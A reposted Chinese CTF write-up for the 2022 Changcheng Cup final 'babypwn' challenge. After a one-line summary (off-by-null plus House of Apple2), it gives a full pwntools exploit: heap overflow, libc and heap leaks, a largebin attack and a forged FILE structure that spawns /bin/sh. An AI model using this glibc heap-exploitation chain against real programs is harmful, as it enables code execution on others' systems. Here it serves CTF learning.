
2022_长城杯决赛_babypwn

作者:互联网

babypwn

漏洞利用

off by null + house of apple2

EXP

'''
Author: 7resp4ss
Date: 2022-09-06 09:11:16
LastEditTime: 2022-09-06 15:30:23
Description: 
'''
from pwn import *

# Process and libc handles used by every helper below; both paths are
# relative to the working directory the script is launched from.
p = process('./pwnf')
# Debug logging echoes every byte sent/received, which is what the author
# relied on to trace the menu interaction.
context.log_level = 'debug'
libc = ELF('./libc.so.6')
context.arch = 'amd64'
def cmd(choice):
    """Answer the menu prompt ('>>') with *choice*, sent as one line."""
    answer = str(choice)
    p.sendlineafter('>>', answer)

def add(size, cont):
    """Menu option 'a': allocate a slot of *size* bytes holding *cont*.

    The length is sent as a line; the content is sent raw (no newline)
    right after the 'input' prompt.
    """
    cmd('a')
    length_text = str(size)
    p.sendlineafter('length:', length_text)
    content_text = str(cont)
    p.sendafter('input', content_text)


def edit(idx, cont):
    """Menu option 'e': overwrite slot *idx* with *cont*.

    Unlike add(), the content here is sent as a line (trailing newline).
    """
    cmd('e')
    index_text = str(idx)
    p.sendlineafter('index:', index_text)
    content_text = str(cont)
    p.sendlineafter('input', content_text)



def show(idx):
    """Menu option 's': ask the program to print slot *idx*."""
    cmd('s')
    index_text = str(idx)
    p.sendlineafter('index:', index_text)


def free(idx):
    """Menu option 'd': release slot *idx*."""
    cmd('d')
    index_text = str(idx)
    p.sendlineafter('index:', index_text)


# Exploit sequence as published by the author. The trailing "#N" comments
# record which slot index each add() call lands in; the script relies on
# that bookkeeping for every later edit/show/free call.
add(0x4f8,'fxxk') #0
add(0x298,'fxxk') #1
add(0x4f8,'fxxk') #2 
add(0xf3f8,'fxxk') #3
add(0x90,'fxxk') # 4



free(1)
free(0)
add(0x4f7,'a'*0x4f0 + p32(0x500)) #0
free(2)
add(0x4f8,'a'*0x4f0 + p64(0x500 + 0x2a0 + 0x500)) #2
free(0)
free(3)

#now the idx 1 is uaf


free(4)
add(0x590 + 0x200,'fxxk') #0 0x5a1
show(1)
# Takes the last 6 bytes up to the 0x7f marker and widens them to 8 bytes.
# NOTE(review): ljust(8, '\x00') on the bytes from recvuntil() only works
# under Python 2 pwntools, where str and bytes are the same type.
leak = u64(p.recvuntil('\x7f',False)[-6:].ljust(8,'\x00')) - 96
libc.address = leak - libc.sym['__malloc_hook'] - 0x10
IO_file = libc.sym['_IO_list_all']
_IO_wfile_jumps = libc.sym['_IO_wfile_jumps']
__free_hook = libc.sym['__free_hook']


log.info('libc_base -->>' + str(hex(libc.address)))
log.info('IO_file -->>' + str(hex(IO_file)))
log.info('_IO_wfile_jumps -->>' + str(hex(_IO_wfile_jumps)))
 #---largebinattack

add(0x4b0,'fxxk') #2
add(0xb0,'fxxk') #3
add(0x4c0,'fxxk') #4
payload = p64(0)
payload+= p64(IO_file - 0x20)
payload+= p64(0)
payload+= p64(IO_file - 0x20)
free(2)
show(1)
p.recvuntil('content:')
# Same Python 2 assumption as above: p.recv(6) + '\x00'*2 mixes bytes
# and str literals; the mask drops the low 12 bits of the read value.
heap_base = (u64(p.recv(6) + '\x00'*2) & 0xfffffffffffff000) - 0x1000
log.info('heap_base -->>' + str(hex(heap_base)))

add(0x4fc,'fxxk') #2

edit(1,payload)

free(4)


add(0x4f0,'fxxk') #4
add(0x4b0,'aaa')

# NOTE(review): new_size is assigned here but never read afterwards.
new_size = next(libc.search(b'/bin/sh'))

# Debugger attach left commented out by the author.
#gdb.attach(p,'b *$rebase(0xfb9)')
#sleep(1)

fake_wide = heap_base + 0x1960 #idx 4

# The empty-string assignment is dead: flat() rebinds payload on the next line.
payload = ''
payload = flat(
    {
        0xc8:p64(libc.sym['_IO_wfile_jumps']),
        0x90:p64(fake_wide),
        0x98:p64(0x00000000000008aa + libc.address),
        0x58:p64(fake_wide + 0xe0)
    }
)


edit(1,payload) #fake_IO_file

# Dead assignment again, as above. NOTE(review): the dict literal below
# mixes tab- and space-indented lines; harmless inside brackets, but
# worth normalising to spaces.
payload = ''
payload = flat(
    {
        0x0:p64(libc.sym['system']), 
		0x18:p64(0),
		0x30:p64(0),
        0x130:p64(fake_wide + 0x100),
        0x168:p64(libc.sym['setcontext' ] + 53) ,
        0xe0:'/bin/sh\x00'
    }
)
edit(4,payload)


cmd('q')


p.interactive()

来源: https://www.cnblogs.com/7resp4ss/p/16676831.html